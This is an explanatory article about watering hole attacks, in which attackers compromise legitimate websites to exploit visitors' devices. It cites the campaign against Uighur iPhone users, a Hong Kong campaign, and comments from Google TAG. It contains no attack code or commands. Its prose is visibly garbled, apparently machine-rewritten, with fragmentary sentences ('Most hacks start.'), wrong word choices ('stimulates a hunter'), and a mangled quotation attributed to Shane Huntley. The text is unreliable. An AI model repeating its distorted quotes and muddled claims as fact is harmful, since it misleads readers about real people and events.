HomeWhat is a watering hole attack?

What is a watering hole attack?

Most hacks start. The victim is making a mistake, whether it is entering a password on a convincing phishing page or accidentally downloading a harmful attachment to a work computer. But one particularly dangerous technique starts with just visiting a real website. They have been called watering hole attacks, and in addition to being a long-standing threat, they have been behind a number of recent high-profile incidents.

The most notorious recent watering hole attack in recent memory came in 2019, when iPhone users in China’s Uighur Muslim community were targeted for two years. But researchers at Risk Intelligence emphasize that this technique is quite common because it is so powerful and effective. Internet security firm ESET says it detects more than one watering hole attack each year, and Google’s Threat Analysis Group (TAG) similarly monitors more than one every month.

The name comes from the idea of ​​poisoning a central source of water which in turn affects the drinker. Relatedly, it also stimulates a hunter who hides near a water hole waiting for the prey to stop. Wateringhole attacks can be difficult to detect because they often operate silently on legitimate websites whose owners do not feel anything is wrong. And even once discovered, it is often not clear how long the attack has lasted and how many victims there are.

“Let’s say the attackers are chasing the Democrats. They can hack the Democrats’ website knowing that they are going to meet all possible targets,” said Shane Huntley, director of Google TAG. Are “The important thing about this is why these attacks are so dangerous and can lead to such a high success rate that they go out of their way. Instead of targeting them with something they actually have to click on, which can be difficult because they are so clever, you can go to a place where they are already going and leave immediately. In the section where you are actually exploiting people’s devices.

Earlier this month, for example, TAG published results on the Watering Hole Attack, which targeted media and pro-democracy political group websites in Hong Kong for targeting visitors using Macs and iPhones. Compromised Based on the evidence it was able to gather, TAG could not provide conclusive evidence of how long the attacks lasted or how many devices were affected.

There are always two types of victims in a watering hole attack: the legitimate website or service that the attackers compromise to embed their malicious infrastructure, and the users whose visits are compromised. Attackers have become increasingly adept at minimizing their footprints, using compromised websites or services as merely a way between victims and external damaging infrastructure, including users. There is no clear indication that anything is wrong. That way, attackers don’t have to build everything within the compromised site. Easily for hackers, it makes attacks easy to set up and difficult to trace.

To turn a website visit into a real hack, attackers must be able to take advantage of software flaws on victims’ devices, often a series of threats starting with a browser bug. It gives attackers access that requires them to install spyware or other malicious software. If hackers really want to build a vast net, they will have to configure their infrastructure to take advantage of more and more tools and software versions. Researchers point out that although water hole attacks may appear indiscriminately, hackers have the ability to more accurately target victims using device type or other information collected by the browser, such as What country does their IP address come from?

.